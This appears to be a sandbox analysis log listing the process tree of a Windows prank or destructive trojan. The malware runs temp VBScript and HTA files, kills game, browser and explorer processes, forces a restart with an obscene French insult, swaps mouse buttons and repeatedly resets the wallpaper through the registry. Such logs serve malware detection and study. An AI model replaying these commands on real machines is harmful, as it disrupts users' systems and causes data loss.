C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\32417.vbs"3⤵PID:3536
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21237.vbs"3⤵
- Blocklisted process makes network request
PID:952
-
-
C:\Windows\system32\timeout.exetimeout 603⤵
- Delays execution with timeout.exe
PID:1152
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll, SwapMouseButton3⤵PID:3732
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\14070.vbs"3⤵PID:2896
-
-
C:\Windows\system32\timeout.exetimeout 143⤵
- Delays execution with timeout.exe
PID:1068
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM hl2.exe3⤵
- Kills process with taskkill
PID:1664
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM javaw.exe3⤵
- Kills process with taskkill
PID:2136
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM RobloxPlayerBeta.exe3⤵
- Kills process with taskkill
PID:1964
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM FortniteClient-Win64-Shipping.exe3⤵
- Kills process with taskkill
PID:5000
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM GenshinImpact.exe3⤵
- Kills process with taskkill
PID:2364
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM Among Us.exe3⤵
- Kills process with taskkill
PID:2860
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe3⤵
- Kills process with taskkill
PID:1416
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe3⤵
- Kills process with taskkill
PID:4204
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe3⤵
- Kills process with taskkill
PID:1900
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM iexplore.exe3⤵
- Kills process with taskkill
PID:1792
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM explorer.exe3⤵
- Kills process with taskkill
PID:3944
-
-
C:\Windows\system32\shutdown.exeshutdown -r -t 60 -c "Dans 1 minutes tu n'as plus de PC fils de viol, On t'a bien baiser le cul fils de pute :)"3⤵PID:4500
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\30130.vbs"3⤵
- Blocklisted process makes network request
- Enumerates connected drives
PID:2624
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23646.vbs"3⤵
- Enumerates connected drives
PID:4032
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8377.vbs"3⤵PID:2180
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\risitas.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- System Location Discovery: System Language Discovery
PID:2112
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1942.vbs" 12449.bat3⤵
- Checks computer location settings
PID:3116 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\12449.bat" "4⤵
- Checks computer location settings
- Modifies registry class
PID:4376 -
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:1340
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:4796
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3224
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:1152
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:2656
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:1692
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:3204
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:3108
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:4544
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:768
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:1008
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:1948
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:1060
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵PID:2732
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3020
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3844
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:4548
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:4204
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:2608
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:1544
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3480
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:4892
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:4268
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:4332
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:3944
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:3636
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3788
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3816
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:3892
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:4540
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:3724
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:1800
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3600
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3644
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:3472
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:532
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:116
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:3972
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:4500
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3556
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:3420
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:4824
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:2652
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:2716
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:4464
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:1840
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:3288
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:3740
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:1104
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:3476
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:5112
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3016
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:3116
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:4360
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:3632
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:2284
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:2864
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:2868
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:1080
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:4792
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:452
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:3108
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:4544
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:2136
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:2332
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:4456
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:1008
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:2732
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:4328
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:4564
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:1600
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:4088
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:1544
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:3808
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3784
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3872
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:2892
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:3788
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:3692
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:3724
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3820
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5032
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:4836
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:3544
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:3932
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:4552
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:4500
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3556
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:1820
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:2652
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:3460
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:4468
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3288
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:1104
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:3476
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5068
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:368
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:1740
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:2232
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3016
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:3116
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:4484
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:2668
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:3104
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:1080
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:452
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:3108
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:5108
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:4512
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:1060
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3020
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:4328
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:4564
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:1600
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:1544
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:4684
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3636
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3816
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:4816
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:1800
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:3488
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:4944
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3932
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:4992
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:2224
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:4832
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:3352
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:4468
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:2280
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:5112
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:1540
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:2896
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:3388
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:3632
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:2456
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:4696
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:1084
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:452
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:5056
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:1060
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3020
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:4328
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:4564
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:3784
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:4684
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:4264
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:4816
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3488
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:1500
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:4648
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:4664
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:216
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:3896
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3476
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:1276
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:3016
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵
- Sets desktop wallpaper using registry
PID:4668
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:2456
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f5⤵PID:4696
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f5⤵PID:3256
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters5⤵PID:4512
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"5⤵PID:1060
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f5⤵PID:4328
-
-
C:\Windows\system32\reg.exereg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f5⤵
- Sets desktop wallpaper using registry
PID:4564
-
-
